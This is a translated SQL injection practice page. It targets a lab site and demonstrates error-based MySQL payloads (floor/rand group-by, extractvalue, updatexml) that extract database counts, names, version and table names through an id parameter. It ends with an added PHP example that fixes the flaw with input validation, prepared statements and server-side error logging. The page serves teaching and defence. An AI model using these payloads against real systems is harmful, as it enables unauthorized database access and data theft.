select * from article where id = 6

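(Debug information: this colored area exists only to print the SQL statement so that you can better understand SQL injection. A normal website would not display it on the page.)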

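INSERT-type SQL injection
Date: 2018-05-07 10:47:31
Popularity: 0
INSERT-type injection has one precondition: the code that executes the SQL statement must also call the mysqli_error() function, so that the database error message is returned in the page, as follows: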
$result = mysqli_query($conn,$sql) or die(mysqli_error($conn));
Practice address (at the very bottom of the left navigation bar):
http://xss.tv/sql-article/addarticle.php
Error-based injection functions
Get the number of databases
http://xss.tv/sql-article/showarticle.php?id=1319' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,count(schema_name),0x7e) from information_schema.schemata)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Get all database names via LIMIT
http://xss.tv/sql-article/showarticle.php?id=1319' and (select 1 from(select count(*),concat((select (select (select concat(0x7e, schema_name, 0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- -
2. Error via ExtractValue
and extractvalue(1, payload)
http://xss.tv/sql-article/showarticle.php?id=1319' and extractvalue(1, concat(0x7e,(select @@version),0x7e)) and updatexml(1,concat(0x23,(select table_name from information_schema.tables where table_schema='newblog' limit 0,1),0x23),1)-- -
3. Error via UpdateXML
+and updatexml(1,payload,1)
http://xss.tv/sql-article/showarticle.php?id=1319' and updatexml(1, concat(0x7e,(select @@version),0x7e),1)-- -
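
Every technique on this page relies on two conditions: the id value is concatenated into the SQL text, and the output of mysqli_error() is returned to the client. The PHP below is an added example (not the practice site's own code) that removes both conditions for the query shown in the debug output; the credentials, the host and the "title" column are assumptions.

```php
<?php
declare(strict_types=1);
// Added example; not the practice site's code. "article", "id" and "newblog"
// appear on the page; credentials and the "title" column are assumptions.

ini_set('display_errors', '0');   // errors never reach the HTTP response
ini_set('log_errors', '1');       // they go to the server log instead
// mysqli throws exceptions, so no code path needs "or die(mysqli_error())".
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function fetch_article(mysqli $conn, string $rawId): ?array
{
    // Weak pattern described on the page, kept only as a comment:
    //   $sql = "select * from article where id = $rawId";
    //   $result = mysqli_query($conn, $sql) or die(mysqli_error($conn));

    // 1. Validate: an article id is a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Bind the value. The SQL text is constant, so quotes or function
    //    calls inside the parameter are never parsed as SQL.
    $stmt = $conn->prepare('SELECT * FROM article WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return is_array($row) ? $row : null;
}

try {
    $rawId = $_GET['id'] ?? '';
    $conn = new mysqli('127.0.0.1', 'app_user', 'app_password', 'newblog'); // assumed
    $article = is_string($rawId) ? fetch_article($conn, $rawId) : null;
    if ($article === null) {
        http_response_code(404);
        exit('Article not found.');
    }
    echo htmlspecialchars((string) ($article['title'] ?? ''), ENT_QUOTES, 'UTF-8');
} catch (mysqli_sql_exception $e) {
    // 3. Detail is logged server-side; the client gets a generic message.
    error_log('showarticle query failed: ' . $e->getMessage());
    http_response_code(500);
    exit('Internal error.');
}
```

The same prepare-and-bind pattern applies to an INSERT statement: bind every column value instead of concatenating it, and keep the database error text in the server log.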